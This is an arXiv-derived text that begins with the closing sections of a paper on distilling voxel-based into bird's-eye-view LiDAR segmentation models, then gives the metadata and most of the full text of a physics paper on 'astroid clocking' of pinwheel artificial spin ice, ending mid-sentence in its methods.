features and use the MSE loss between \(f_{B}\) and \(f_{V^{\prime}}\) with weights from labels. The label-weight distillation loss is given as follows: \[\mathcal{L}_{LWD}\left(f_{B},f_{V^{\prime}}\right)=\frac{1}{\sum_{j=1}^{M}N_{ j}}\left\|\frac{f_{B}^{j}}{\left\|f_{B}^{j}\right\|_{2}}-\frac{f_{V^{\prime}}^{ j}}{\left\|f_{V^{\prime}}^{j}\right\|_{2}}\right\|_{2}^{2} \tag{4}\] where \(j\) represents the \(j\)-th selected region and \(N_{j}\) represents the number of nonempty voxels in the \(j\)-th region. ### _Loss Function_ Our loss function has two parts: the original segmentation loss of BEV-based methods \(\mathcal{L}_{\text{wce}}\) and \(\mathcal{L}_{\text{lovasz}}\), the loss of distillation \(\mathcal{L}_{\text{VDD}}\), the loss of label-weight distillation \(\mathcal{L}_{\text{LWD}}\) and the loss of logit distillation \(\mathcal{L}_{\text{Logit}}\). \(\mathcal{L}_{\text{wce}}\) means weighted cross-entropy loss. We determine the weight according to the reciprocal proportion of different categories of points in the whole training set. We assume that there are \(C\) classes, \(x\) is the input, \(y\) is the target, \(w=[w_{0},,w_{1},\cdots,w_{C-1}]\) is the class weight, and \(N\) is the point number of current batch. \[\mathcal{L}_{\text{wce}}\ =-\sum_{n=1}^{N}\frac{1}{\sum_{n=1}^{N}w_{y_{n}}}w_{y_{n}} \log\frac{\exp\left(x_{n,y_{n}}\right)}{\sum_{c=1}^{C}\exp\left(x_{n,c}\right)}. \tag{5}\] \(\mathcal{L}_{\text{lovasz}}\) is proposed by [20], which is directly used on the intersection-over-union (IoU) score. Given the labels \(y\), the predicts \(x\), the IoU of class \(c\) is defined as \[J_{c}\left(y,x\right)=\frac{\left|\left\{y=c\right\}\cap\left\{x=c\right\} \right|}{\left\{y=c\right\}\cup\left\{x=c\right\}}. \tag{6}\] \[\mathcal{L}_{\text{lovasz}}\ =1-J_{c}\left(y,x\right). \tag{7}\] \(\mathcal{L}_{\text{Logit}}\) is used in the probability of prediction like [13]. Thus, we can obtain the final loss by \[\begin{split}\mathcal{L}=&\mathcal{L}_{\text{wce}} \ +\mathcal{L}_{\text{lovasz}}\ +\beta_{1}\mathcal{L}_{\text{VDD}}\left(f_{B^{\prime}}^{i},f_{V^{ \prime}}^{i}\right)\\ &+\beta_{2}\mathcal{L}_{\text{LWD}}\left(f_{B},f_{V}\right)+\beta_ {3}\mathcal{L}_{\text{Logit}},\end{split} \tag{8}\] where \(\beta_{1},\beta_{2},\beta_{3}\) are the balance coefficients. ## IV Experiment ### _Datasets and Metrics_ SemanticKITTI [1] is a large dataset for LiDAR point cloud semantic segmentation, which provides annotations for all points. It has 22 point cloud sequences, each collected from a different scene. As recommended, we use 00 to 10 for training, 08 for validation during training, and 11 to 21 for testing. We use the evaluation metric of the mean intersection-over-union (mIoU) over all classes. The IoU is defined as \(mIoU=\frac{1}{n}\sum_{c=1}^{n}\frac{TP_{c}}{TP_{c}+FP_{c}+FN_{c}}\), where \(TP_{c}\) denotes the number of true positive points for class \(c\), \(FP_{c}\) denotes the number of false positives, and \(FN_{c}\) is the number of false negatives. The mIoU is the average of all classes. ### _Implementation Details_ We use Cylinder3D [9] as an example of voxel-based methods and PolarNet [5] for BEV-based methods. Cylinder3D uses cylindrical partition and sparse convolution network, while PolarNet first projects the point clouds to BEVs and uses ring convolution designed for BEV-based methods. They use a similar pipeline for data preprocessing, point feature extraction with PointNet [2], and encoder and decoder modules. We use the original model structure and parameters of Cylinder3D [9] and PolarNet [5]. Here, we list our main settings and parameters used in knowledge distillation. We select the 2nd and 3rd layers in the encoder and decoder for voxel-to-pillar distillation and the last layer for label-weight Fig. 3: Illustration of the label-weight distillation (LWD) module. We combine height embeddings with the original teacher features and choose features of the corresponding location using proposed selective sampling. Finally, we apply MSE loss with label-generated weights between selected features from the teacher and the student models. distillation. We divide the whole scene into 24 regions and set M to 2 for selective sampling for label-weight distillation. For other parameters, we set the batchsize to 2 and use Adam [22] with a learning rate of 0.001 for optimization. We train our model for 40 epochs. The coefficients of loss balance are \(2,2,1\). ### _Results_ The results on the SemanticKITTI dataset [1] are shown in Tab. I. We compare different methods on the test set, including point-based methods such as KPConv [3] and RandLa-Net [4] and projection-based methods such as RangeNet [6], SqueezeSegV2 [7] and SalsaNext [8]. The last groups are our teacher model Cylinder3D [9], original PolarNet [5] and PolarNet trained with our framework. It can be seen that our model surpasses the baseline by 5% mIoU. In Sec. III, we mention that height information loss is the main reason for BEV-based methods performing worse than voxel-based methods. The experiment also proves that some classes, such as motorcycle, truck, and person, have a huge gap between Cylinder3D and PolarNet. Our proposed method mainly focuses on height information lost through voxel-to-pillar distillation and label-weight distillation. From the experiment, we can see that classes with richer height information perform better than the baseline. We also conduct experiments on Like Paris-Lille-3D [15]. The results shown in Tab. II demonstrate our method's effectiveness and generalization power. test different kinds of sparse operators, such as scatter-max and sparse convolution, used for changing the resolution of features, and we can see that sparse convolution is more appropriate to compress the 3D sparse features to the BEV plane. Domain transfer and cross-attention further improve the performance of our model. ### _Visualization_ Fig. 4 shows the visual comparison between Cylinder3D, PolarNet, and our method. We can see that the error numbers of different methods are different at locations with obvious height changes or rich semantic information. Fig. 4(a) and Fig. 4(b) are the point clouds and ground truth, and Fig. 4(c) is the number of non-empty voxels at different locations, where the darker the color is, the greater the height change. Fig. 4(d), Fig. 4(e) and Fig. 4(f) are the error number counts at different locations of Cylinder3D [9], PolarNet [5] and our method. As shown in the red circles, our method can predict objects such as buildings, trucks, etc., as correctly as Cylinder3D, but PolarNet often makes incorrect predictions in this case. ## V Conclusions In this paper, we propose a general knowledge distillation framework from voxel-based models to BEV-based models for point cloud semantic segmentation. Voxel-to-pillar distillation distills sparse 3D features to 2D BEV features for middle layers and makes the BEV-based model learn more structural and geometric knowledge. Label-weight distillation is used for the last layer before classification, which helps the model pay more attention to regions with more height information. Experiments on the SemanticKITTI dataset and Paris-Lille-3D demonstrate that our method can outperform the baseline by 5% mIoU on the test set, especially for classes such as motorcycle and person, with more than 15% improvement.
2306.07388
Clocked dynamics in artificial spin ice
Artificial spin ice (ASI) are nanomagnetic metamaterials exhibiting a wide range of emergent properties, which have recently shown promise for neuromorphic computing. However, the lack of efficient protocols to control the state evolution of these metamaterials has been limiting progress. To overcome this barrier, we introduce astroid clocking, a global field protocol offering discrete, gradual evolution of spin states. The method exploits the intrinsic switching astroids and dipolar interactions of the nanomagnets to selectively address ASI spins in sequence. We demonstrate, experimentally and in simulations, how astroid clocking of pinwheel ASI allows ferromagnetic domains to be gradually grown or reversed at will. More complex dynamics arise when the clock protocol allows both growth and reversal to occur simultaneously. Astroid clocking offers unprecedented control and understanding of ASI dynamics in both time and space, extending what is possible in nanomagnetic metamaterials.
Johannes H. Jensen, Anders Strømberg, Ida Breivik, Arthur Penty, Michael Foerster, Miguel Angel Niño, Muhammad Waqas Khaliq, Gunnar Tufte, Erik Folven
2023-06-12T19:35:04Z
http://arxiv.org/abs/2306.07388v2
# Clocked dynamics in artificial spin ice ###### Abstract Artificial spin ice (ASI) are nanomagnetic metamaterials exhibiting a wide range of emergent properties, which have recently shown promise for neuromorphic computing. However, the lack of efficient protocols to control the state evolution of these metamaterials has been limiting progress. To overcome this barrier, we introduce _astroid clocking_, a global field protocol offering discrete, gradual evolution of spin states. The method exploits the intrinsic switching astroids and dipolar interactions of the nanomagnets to selectively address ASI spins in sequence. We demonstrate, experimentally and in simulations, how astroid clocking of pinwheel ASI allows ferromagnetic domains to be gradually grown or reversed at will. More complex dynamics arise when the clock protocol allows both growth and reversal to occur simultaneously. Astroid clocking offers unprecedented control and understanding of ASI dynamics in both time and space, extending what is possible in nanomagnetic metamaterials. **Keywords: Artificial Spin Ice, Magnetic Metamaterial, Pinwheel Artificial Spin Ice, Permalloy, Nanofabrication, Nanomagnets, Coupled Nanomagnetic Ensembles, Astroid Clocking, Unconventional Computation, Material computation, flatspin** ## 1 Controlling artificial spin ice Artificial spin ice (ASI) are systems of coupled nanomagnets arranged on a two-dimensional lattice. The nanomagnets are elongated, giving them two stable magnetization directions, thus behaving as artificial spins. Dipolar interactions give rise to a rich variety of emergent behavior, as determined by the ASI geometry[1, 2, 3]. As this behavior can be probed directly, ASIs have attracted considerable interest as model systems for the study of fundamental physics[4, 5]. More recently, ASIs have shown promise as substrates for computation[6, 7, 8, 9, 10, 11, 12]. External fields are the primary method used to perturb ASIs in a controlled manner. Various global field protocols have been employed. For example, a cycled in-plane field is often used to characterize magnetization reversal[13, 14, 15, 16, 17, 18, 19, 20, 21]. Another approach is to use a rotating field with slowly decreasing amplitude to effectively anneal the ASI to a low energy state[22, 23, 24, 25, 26, 27, 28, 29]. While there are variations of these simple field protocols, more complex protocols are largely unexplored. These approaches use field strength to modulate ASI behavior, which will typically result in uncontrolled avalanches of activity[30]. An in-plane field will advance ASI state primarily when the strength of the field is increased beyond the coercivity of the array, and is highly dependent on field resolution[25, 29, 19]. Consequently, the discrete spin flip dynamics in the ASI are sudden and hard to control. Here, we introduce a new field protocol scheme called _astroid clocking_, which produces fundamentally different spin flip dynamics. Astroid clocking of an ASI results in a step-wise, gradual evolution of spin states. This offers unprecedented control and understanding of the dynamical process in both time and space. By exploiting the shape and orientation of the nanomagnet switching astroids and their dipolar coupling, specific field angles are employed to selectively address different parts of the ensemble. A clock protocol pulses fields at these angles in an alternate fashion, driving the intrinsic dynamics of the ASI. Distinctively, the clock pulses maintain a constant field amplitude. In the context of nanomagnetic logic, Nomura et al. [31] demonstrated how the shape of two overlapping Stoner-Wohlfarth astroids can be exploited to preferentially switch nanomagnets in a 1D shift register. Astroid clocking extends and generalizes this concept to 2D nanomagnet arrays and non-elliptical nanomagnets with different astroid shapes. We show how astroid clocking reveals the intrinsic dynamics of coupled nanomagnetic systems. For this study we consider the pinwheel ASI system, but stress that astroid clocking is readily applicable to other coupled nanomagnetic systems as well. We demonstrate and analyse how ferromagnetic domains in pinwheel ASI can be gradually grown and reversed at will using astroid clocking. Different clock protocols are explored, giving rise to distinct properties of the spin flip dynamics. ## 2 Astroid clocking Pinwheel ASI[2, 19, 32] consists of nanomagnets arranged on two interleaved square sublattices, as shown in Fig. 1a. In this study, the magnets in the two sublattices \(L_{a}\) and \(L_{b}\) are rotated \(+45^{\circ}\) and \(-45^{\circ}\) with respect to the array edges. The sublattice and magnetization of the magnets are indicated by their color: magnets in sublattice \(L_{a}\) are orange or blue, while magnets in sublattice \(L_{b}\) are pink or green. For brevity, we will refer to magnet state by these four colors. Pinwheel ASI favors a ferromagnetic ordering, with emergent domains of coherent magnetization. Fig. 1a shows the four possible domain directions: rightwards (orange/pink), leftwards (blue/green) and so on. The ferromagnetic domains are separated by domain walls, which are slightly less energetically favorable[32]. The switching threshold of a nanomagnet depends on the field angle, and can be approximated by the Stoner-Wohlfarth astroid. Fig. 1b shows the switching astroids for the two orientations of stadium-shaped magnets in pinwheel ASI[33]. A magnet will switch state if the total field acting on it lies outside the astroid boundary, _and_ the field is directed against the current magnetization. Nanomagnet shape largely determines the shape of the astroid. Stadium-shaped nanomagnets, commonly used in ASI, have a switching astroid with 2-fold rotational symmetry[33]. This is in contrast to classical Stoner-Wohlfarth astroids that display 4-fold rotational symmetry derived for elliptical nanomagnets[34]. Switching astroids that break the 4-fold rotational symmetry, can be exploited to selectively address nanomagnets that are rotated 90deg with respect to each other. If the total field lies within the shaded regions in Fig. 1b, _only_ the nanomagnets in the corresponding sublattice will be able to switch. A field in the orange/blue shaded regions will address only the magnets in sublattice \(L_{a}\), while a field in the pink/green Figure 1: Astroid clocking of pinwheel ASI. **a**, a small \(4\times 4\) pinwheel ASI, formed by two interleaved sublattices \(L_{a}\) (solid outline) and \(L_{b}\) (dashed outline) with magnets oriented at \(+45\)° and \(-45\)°, respectively. Colors correspond to magnetization direction as indicated by the white center arrows. The magnetic state shows the four possible ferromagnetic domains of pinwheel ASI, where the net magnetization forms a counter-clockwise magnetic flux closure pattern. **b**, switching astroids of the magnets in sublattice \(L_{a}\) (solid lines) and \(L_{b}\) (dashed lines), along with the four clock fields, \(\mathbf{H}_{A}\), \(\mathbf{H}_{B}\), \(\mathbf{H}_{a}\), and \(\mathbf{H}_{b}\). The astroid edges are colored according to the magnet state which is promoted when fields cross the edge. Similarly, the colored regions correspond to fields that _exclusively_ promote a magnet state within a sublattice. Astroid axes are normalized with respect to the hard axis switching threshold, \(h_{k}\). regions will address only magnets in \(L_{b}\). Furthermore, each region promotes a specific magnet state within each sublattice, e.g., a field in the blue shaded region promotes blue magnets by switching orange magnets. In this study, we define two _bipolar clocks_ A and B along the \(+22^{*}\) and \(-22^{*}\) axes, respectively. As shown in Fig. 1b, each clock consists of a positive and negative _clock field_ of magnitude \(H\) along the clock axis. The four arrows in Fig. 1b are colored according to the magnet states they promote, e.g., the \(\mathbf{H}_{A}\) field only promotes orange magnets. The dipolar fields \(\mathbf{h}_{\mathrm{dip}}\) from neighboring magnets may either promote or prevent switching. If the dipolar fields are directed out of (into) the astroid, they effectively promote (prevent) switching. A clock field can thus selectively address a subset of a sublattice, depending on the state of the ensemble. The clock angles \(\pm 22^{*}\) are selected to allow the dipolar fields to have a large influence on switching, using a field strength \(H\) close to the switching threshold. However, a precise angle is not crucial and the method tolerates a wide range of clock angles. Our system tolerates clock angles in the range \(10^{\circ}\) to \(35^{\circ}\), and field strengths accurate to \(3\,\mathrm{mT}\) to \(4\,\mathrm{mT}\). Fig. 2 illustrates astroid clocking, where a _clock pulse_ is defined as ramping a clock field from zero to \(H\) and down to zero again. The ramping speed is much slower than the timescale of nanomagnetic switching. A _clock protocol_ is a specific sequence of clock pulses. For example, \(AB\) clocking consists of repeated alternating clock pulses of \(A\) and \(B\). We define a _clock cycle_ as a single sequence of the clock pulses in a protocol, e.g., an \(aAbB\) clock cycle is the sequence of four pulses \((a,A,b,B)\). A _unipolar_ clock protocol exclusively employs one polarity of each clock, while a _bipolar_ clock protocol employs both polarities. ## 3 Unipolar clocking First, we explore the spin flip dynamics of pinwheel ASI when subject to the unipolar clock protocols \(AB\) and \(ab\). The \(50\times 50\) pinwheel ASI (5100 magnets) is initialized with a small rightwards (orange/pink) domain in the center of an otherwise leftwards polarized (blue/green) array. Fig. 3 (1) shows a closeup of the initial state. Figure 2: Clock diagram of astroid clocking. Clock protocols are defined by sequences of clock pulses. The clock diagram shows \(AB\) clocking (alternating pulses of the positive clock fields \(\mathbf{H}_{A}\) and \(\mathbf{H}_{B}\)) followed by \(ab\) clocking (alternating pulses of the negative clock fields \(\mathbf{H}_{a}\) and \(\mathbf{H}_{b}\)). Fig. 3 (2-8) shows the state evolution of the array subject to \(AB\) clocking, obtained from flatspin simulations (see Methods). As expected, the \(A\) pulse selectively switches magnets in sublattice \(L_{a}\) from blue to orange, while the \(B\) pulse selectively switches magnets in sublattice \(L_{b}\) from green to pink. Interestingly, the particular magnets that switch are the ones along the domain wall. As a result, the inner (leftwards) domain grows gradually over time, with only a thin layer of the domain advancing after each clock pulse. The growth is _monotonic_ and _step-wise_, driven by the clock pulses. A curious property is that the domain grows mainly in the horizontal direction. In Fig. 3 (2-8), the magnets along the vertical domain walls are the only ones to switch. If the growing domain reaches the edges of the array, the direction of growth changes and becomes vertical, eventually filling the entire array (Fig. 7). Inverting the clock pulses (\(ab\) clocking), will instead grow the outer (blue/green) domain and consequently shrink (reverse) the inner (orange/pink) domain. As can be seen in Fig. 3 (9-12), domain reversal from (8) proceeds in both vertical and horizontal directions, resulting in reversal of the inner domain in fewer clock cycles compared to growth. Hence there is an apparent _asymmetry_ in the direction of domain growth and reversal. Figure 3: Simulation of unipolar astroid clocking of pinwheel ASI in flatspin. Each snapshot shows a zoomed-in view of the \(50\times 50\) nanomagnet system, at different points during a clock protocol. (1) shows the initial state, a small orange/pink (rightwards) domain in the center of an otherwise polarized blue/green (leftwards) array. (2-8) show the state during \(AB\) clocking, resulting in gradual domain growth. (9-12) show the subsequent states during \(ab\) clocking, resulting in gradual domain reversal. Magnets that change state between snapshots are highlighted with a solid black outline. ## 4 Growth and reversal mechanism To understand the mechanism behind the domain growth and reversal, we consider the larger domain shown in Fig. 4c, subject to \(\mathbf{H}_{A}\). In Fig. 4a, we plot the relative locations of all the magnets within their respective switching astroids. Each dot represents the total field \(\mathbf{h}_{i}=\mathbf{H}_{A}+\mathbf{h}_{\mathrm{dip}}^{(i)}\) experienced by a magnet \(i\) in its _local frame of reference_. There are four clusters of dots within the astroids, corresponding to the four magnet colors, where only the blue magnets are close to switching. The internal structure of each astroid cluster is a result of the nanomagnet dipolar coupling, and a direct consequence of the ASI geometry. In the absence of dipolar fields, each cluster collapses into a single point. The dipolar fields add complex structure to the clusters, with sub-groups corresponding to different subsets of magnets within the ASI. For a detailed analysis of neighbor contributions, see Supplementary S1. The inset shown in Fig. 4b reveals the structure of the blue cluster. Notice there are a few blue dots that lie outside the astroid, corresponding to magnets that are eligible for switching, which are highlighted in Fig. 4c. Evidently, the switchable magnets all lie along the vertical and \(+45^{\circ}\) domain walls. When a magnet switches, its location within the astroid jumps to the cluster of opposite spin, e.g., a blue magnet switches to the orange state. In addition, neighboring magnets will see a change in the dipolar fields, causing movement within their respective clusters. In this way, the switching of a magnet may enable future switching in neighboring magnets, either during the current or a future clock pulse. Figure 4: Astroid clusters and astroid (black curve) for the pinwheel system shown in **c**, when subject to the clock field \(\mathbf{H}_{A}\). **a**, astroid cluster plot where each dot represents the total field \(\mathbf{h}_{i}=\mathbf{H}_{A}+\mathbf{h}_{\mathrm{dip}}^{(i)}\) experienced by a magnet \(i\), projected onto its parallel (\(h_{\parallel}\)) and perpendicular (\(h_{\perp}\)) axis. The colors in the plot correspond to magnet state. Note that the astroid plot shows location _relative_ to each magnet’s own switching threshold, e.g., orange magnets are far from switching as they are aligned with \(\mathbf{H}_{A}\). **b**, closeup of the blue cluster, revealing a sub-group of blue magnets that lie outside the switching astroid and are eligible for switching. These magnets are highlighted in **c**, and are all found to lie along the vertical and \(+45^{\circ}\) domain walls. The data is obtained from flatspin simulations. The observed horizontal domain growth can now be explained from the internal structure of the astroid clusters. We have seen that magnets along certain types of domain walls can be selectively switched under an applied clock field. Switching the blue (highlighted in Fig. 4c) magnets along these domain walls reverses their dipolar fields, which affects the structure of the green cluster. Consequently, green magnets that are part of the domain walls will approach the switching astroid. When the \(\mathbf{H}_{B}\) field is subsequently applied, these magnets will be outside the astroid and hence switch. As this cycle repeats, the result is an apparent horizontal domain growth emerging from the dipolar interactions and clock fields. During domain _reversal_, both horizontal and vertical domain walls take part in the process. As a result, reversal requires fewer clock cycles compared to growth. During reversal, the switchable magnets lie along both the horizontal, vertical and \(-45^{\circ}\) domain walls (Fig. 8). We find that the horizontal domain wall movement, particular to reversal, is dependent on the curvature of the reversing domain. If the horizontal domain wall is surrounded by a blue/green domain on three sides, there is a stronger dipolar "push" towards the astroid edge. As such, domain shape plays a crucial role in the reversal process. When a domain grows to reach the edges of the array, there is an apparent transition from horizontal to vertical growth (Fig. 7). We find that vertical growth proceeds by avalanches along the domain wall, starting at the bottom-left and top-right corners of the domain, close to the array edges. ## 5 Experimental growth and reversal Next, we demonstrate astroid clocking of pinwheel ASI experimentally. Samples are imaged with x-ray magnetic circular dichroism photoemission electron microscopy (XMCD-PEEM), with an in-situ vector magnet to perform astroid clocking. See Methods for details. After polarizing all magnets in the leftwards direction (bright contrast), we perform steps of \(AB\) clocking, imaging in-between each clock cycle. Fig. 5a shows total magnetization of the ensemble, obtained from the XMCD-PEEM images, which increases in a stable, monotonic fashion. Selected experiment snapshots are shown in Fig. 5b. Snapshots (1-3) show that domains nucleate at the vertical edges then predominantly expand horizontally. Domain formation at the _vertical_ array edges can be explained by the dipolar field-driven mechanism behind \(AB\) clocking. While domain nucleation along horizontal edges is possible, continued growth primarily occurs in the horizontal direction, preventing further expansion of horizontal edge nucleated domains. In any physical ASI system, the nanomagnets will exhibit a range of intrinsic switching thresholds, a _disorder_, due to imperfections and microscopic variations of material composition. Disorder affects both domain shape and growth dynamics, as evident in our experimental results. Compared to the idealized simulations, domains appear more organic, with distinct features such as jagged edges, slanted domain walls, and sporadic holes. In terms of dynamics, some domain borders get stuck for several clock cycles, while others advance more than one step during a single cycle (see Fig. 9). By introducing disorder to the simulations (see Methods), we obtain results that more closely resemble the experiment. The magnetization curve and snapshots from simulations _with disorder_ are included in Fig. 5. Notice how the simulated snapshots show organic-looking domains that resemble the domains of the experiment. After growth, we apply the reversal clock protocol, \(ab\) clocking. For each \(ab\) clock cycle, the magnetization reduces sharply, with domains shrinking more rapidly compared to the increase during growth. Comparing snapshot 3 and 4 of Fig. 5b, it is clear that the domains shrink in both vertical and horizontal directions. Figure 5: Results of growth and reversal with unipolar clock protocols, and control experiment. **a**, total magnetization of the ensembles subject to the different clock protocols. The timeline indicates clock time, labeled by the clock protocol. During \(AB\) clocking, the ensembles undergo growth and hence an increase in magnetization. The second phase, \(ab\) clocking, quickly reverses domains and total magnetization. The control experiment, consisting of separate \(A\) and \(B\) clock sequences, show no development of the domains. **b**, magnetic image snapshots (experiemental XMCD-PEEM images and flatspin simulated XMCD-PEEM contrast images) of the ensembles at the specified points in time. The depicted ensembles are approximately \(12.5\,\mathrm{\SIUnitSymbolMicro m}\times 12.5\,\mathrm{\SIUnitSymbolMicro m}\) (\(50\times 50\) pinwheel ASI, 5100 magnets). All XMCD-PEEM images are available in Figs. 9 and 10. Videos of the experiment and simulation are provided in Supplementary Videos 1 and 2. Next, we conduct a control experiment to verify that simply repeating a clock pulse \(A\) or \(B\) does not result in domain growth. After re-initializing the system, we apply several pulses of \(A\), then several pulses of \(B\), imaging after each pulse. As seen in Fig. 10 and the last part of Fig. 5a, only the first application of \(A\) or \(B\) results in growth. Growth progresses only when the type of clock pulse is changed, which confirms that the alternating pattern of \(A\) and \(B\) is what drives the observed domain growth. These experiments affirm the viability of astroid clocking in the face of experimental sensitivities (as low as \(<\)1 mT from Fig. 4) and potential impediments such as fabrication imperfections, temperature effects, and material degradation. While unstable individual magnets and inaccuracies in the image analysis induce some noise, it is negligible compared to the effect of astroid clocking. Experimental astroid clocking is surprisingly robust, demonstrating that it is possible to precisely control the spin flip dynamics of ASIs using global fields. ## 6 Bipolar clocking In bipolar clocking, each clock may be pulsed in both polarities. We consider two clock protocols illustrated in Fig. 11, namely \(aAbB\) and its inverse, \(AaBb\) clocking. In contrast to unipolar clocking, the magnetic fields in these bipolar clock protocols are balanced, i.e., the sum of all clock fields is zero. One might then expect that this results in a net zero magnetization change. On the contrary, bipolar clocking also results in domain growth and reversal, and a net change in magnetization. Fig. 6a plots the total magnetization of pinwheel ASI subject to bipolar clocking. As can be seen, \(aAbB\) clocking results in net domain growth, while \(AaBb\) clocking results in domain reversal. In contrast to unipolar clocking, bipolar clocking can also induce morphological changes to the growing domains. As a result of the bipolarity of the clock pulses, domains are now able to both grow and shrink within the same clock cycle. In the experiment snapshots of Fig. 6b, we observe growth from (1) to (2), followed by a clear change in domain morphology from (2) to (3), and further growth between (3) to (4). In simulations, we can observe the step-wise details of simultaneous growth and morphology changes, as shown in the zoomed in snapshots. Inverting the clock protocol (\(AaBb\) clocking) results in domain reversal. The deciding factor for growth or reversal is the polarity of the last clock pulse at the transition between the two clocks. Each clock in \(aAbB\) clocking, for example, ends on the positive polarity at the transition (\(aA\) and \(bB\)), resulting in growth of the rightwards (orange/pink) domains. Within a bipolar clock cycle, there is an apparent competition between growth and reversal. Some domain wall configurations result in net domain growth (others in net reversal), in a "one step back, two steps forward" process (see Supplementary S2). In this way, a domain may grow horizontally and reverse vertically, thereby gradually changing shape over time (see Fig. 12). While the balance between growth and reversal can be delicate, there is a clear trend for the clock protocols explored here, namely growth for \(aAbB\), and reversal for \(AaBb\). Compared to unipolar clocking, the dynamics in bipolar clocked pinwheel ASIs are more varied and complex. While there is a gradual net domain growth, the activity can intermittently spike and linger, depending on the particular state of the ensemble (see Supplementary Videos 3 and 4). Bipolar clocking hence unlocks a wide variety of complex dynamic behavior in pinwheel ASI, while at the same time offering considerable control by choice of clock protocol. Figure 6: Results of growth and reversal with bipolar clocking, and control experiment. **a**, total magnetization of the ensembles subject to the different bipolar clock protocols. The timeline indicates clock time, labeled by the clock protocol. During the first phase, \(AaBb\) clocking, the ensembles undergo domain growth and increase in magnetization. The controls, \(aA\) clocking and \(bB\) clocking, show no net growth. Further growth (\(aAbB\) clocking) and reversal (\(AaBb\) clocking) occur after the controls. **b**, magnetic image snapshots of the experimental ensemble, and zoomed in views of the flatspin simulated ensemble, at the specified points in time. The growing domains change morphology during the clock protocol. All XMCD-PEEM images are available in Supplementary Fig. 4. Videos of the experiment and simulation are provided in Supplementary Videos 3 and 4. ## 7 Conclusions We have introduced astroid clocking, a scheme for field-driven evolution in nanomagnetic metamaterials. The method exploits the shape and orientation of the nanomagnet switching astroids and dipolar coupling to selectively address subsets of the nanomagnets. Pulsing specific fields in sequence results in clocked dynamics that are both gradual and discrete in time. Considerable control of the dynamics is available through choice of clock protocol. This work demonstrates how astroid clocking can be used to control the growth and reversal of ferromagnetic domains in pinwheel ASI. In this system, unipolar clocking results in monotonic domain growth or reversal, while bipolar clocking adds more complex dynamics that include changes to domain morphology. The principles of astroid clocking are not limited to pinwheel ASI, and are applicable to a range of coupled nanomagnetic systems. Exploring the clocked dynamics of established and future nanomagnetic metamaterials is an exciting research direction. The space of possible clock protocols remains vast. Astroid clocking offers unprecedented control and understanding of ASI dynamics in both time and space. The method enables new directions in ASI research and paves the way for novel devices based on nanomagnetic metamaterials. ## 8 Extended data figures **Fig. 8 a-b**, astroid clusters during reversal, when the pinwheel system shown in **c** is subject to the negative clock field \(\mathbf{H}_{b}\). **b**, astroid clusters during reversal have a different structure compared to growth. Switchable magnets outside the astroid are highlighted in **c**. During reversal, the switchable magnets are along both the horizontal, vertical and \(-45^{*}\) domain walls. Switchable magnets along the horizontal domain wall is attributed to the curvature of the inner domain. Figure 9: XMCD-PEEM images of all steps from the relevant unipolar clock protocol series. Time starts at \(t=0\), and is incremented by 1 for each clock step, with clock pulses indicated by the labels. The black (rightwards) domains grow with application of \(AB\) clocking, and quickly reverses with \(ab\) clocking. Red circle highlights: The short, vertical domain wall terminating the black domain in the center region of snapshot \(t=20\) exemplifies both avalanching domain growth and a stuck domain wall. In snapshot \(t=21\) the top part of the domain wall has progressed in an avalanche to form a finger extension of the domain, while the bottom part of the domain wall remains as before. Figure 11: Clock diagram of bipolar \(aAbB\) clocking followed by its inverse, \(AaBb\) clocking. Bipolar clocking employs both positive and negative clock pulses. Figure 10: XMCD-PEEM images of the control experiment. The system is reinitialized at \(t=51\) (following from Fig. 9), and \(t\) is incremented by 1 for each clock step, with clock pulses indicated by the labels. The first \(A\) clock pulse promotes dark (rightwards) magnets, equivalent to half a clock cycle, while subsequent applications of \(A\) incurs no further change. When the clock pulse is changed to \(B\), dark (rightwards) magnets are again promoted, equivalent to the second half of an \(AB\) clock cycle. Furthermore, additional \(B\) clock pulses incurs no change in the state. Figure 12: Bipolar \(aAbB\) clocking of pinwheel ASI. Each snapshot shows a zoomed-in view of a \(50\times 50\) system, at different points during a clock protocol. (1) shows the initial state, an orange/pink (rightwards) domain in the center of an otherwise polarized blue/green (leftwards) array. (2-12) show the state during \(aAbB\) clocking, with simultaneous domain growth (horizontally) and reversal (vertically). As a result the domain gradually changes morphology over time. Magnets that change state between snapshots are highlighted by a solid black outline. ## Methods ### Sample fabrication details The samples are arrays of permalloy nanomagnets fabricated in pinwheel ASI geometries on a silicon substrate. The resist mixture, 1:2 CSAR 62:anisole, is spin-coated onto the substrate at 4000 rpm, achieving a thickness of \(\sim\)100 nm. Following coating, samples are soft baked at 150 C for 1 minute. The desired patterns, arrays of \(220\,\mathrm{nm}\times 80\,\mathrm{nm}\) stadium shaped nanomagnets in \(30\times 30\) and \(50\times 50\) pinwheel geometries, are then exposed using the Elionix ELS-G100 EBL system. Samples are post-exposure baked at 150 C for 1 minute. The patterned resist is developed using AR600-546 for 1 minute, rinsed with isopropanol, and nitrogen dried. Permalloy (Ni\({}_{0.79}\)Fe\({}_{0.21}\)) is deposited to a thickness of 25 nm via electron beam evaporation using a Pfeiffer Vacuum Classic 500 system, and capped with a 2 nm aluminium layer. Finally, the samples undergo ultrasound-assisted lift-off using a dedicated stripper (AR600-71), leaving behind the patterned permalloy nanomagnets. Post-fabrication, the precision and quality of the fabricated nanomagnet arrays are inspected using Scanning Electron Microscopy (SEM). This SEM inspection confirmed that the permalloy nanomagnets are properly formed, free-standing, and without significant defects. ### XMCD-PEEM and clocking procedure Experimentally realized clocking of fabricated ASIs is carried out under magnetic microscopy inspection. We use a photoemission electron microscope with x-ray magnetic circular dichroism (XMCD-PEEM) for magnetic contrast to observe single magnet states of the ASI ensembles[35]. An in-plane, bi-axial quadrupole magnet with two pairs of coils and a split 2D-yoke provides astroid clocking fields[36]. The signal at the Fe L\({}_{3}\) edge is exploited for ferromagnetic XMCD contrast. The orientation of the ASI ensembles, applied magnetic fields, and XMCD contrast is carefully selected. Samples are mounted with top and bottom ensemble edges parallel to the synchrotron light, with each nanomagnetic element oriented \(\pm 45^{\circ}\) to the light. This orientation guarantees balanced magnetic contrast for nanomagnets of both sublattices \(L_{a}\) and \(L_{b}\). The in-plane field direction is given relative to the incoming x-ray illumination, with angle values increasing counter-clockwise. Consequently, the field directions and ensemble orientation align with the illustration in Fig. 1, with an added light axis (providing magnetic contrast) parallel to the \(h_{x}\)-axis. The general experimental procedure is to initialize the ASI system, then apply clock protocols interspersed with magnetic imaging. We initialize the system by applying a strong, polarizing magnetic field (72 mT along 180), followed by two smaller fields, (18 mT along 0 and 3.5 mT along 180) to demagnetize the yoke. For the bipolar clocking, however, the initial field strength is 82 mT. The difference in field strength is due to observed differences in the ensemble coercivity. Successful initialization is 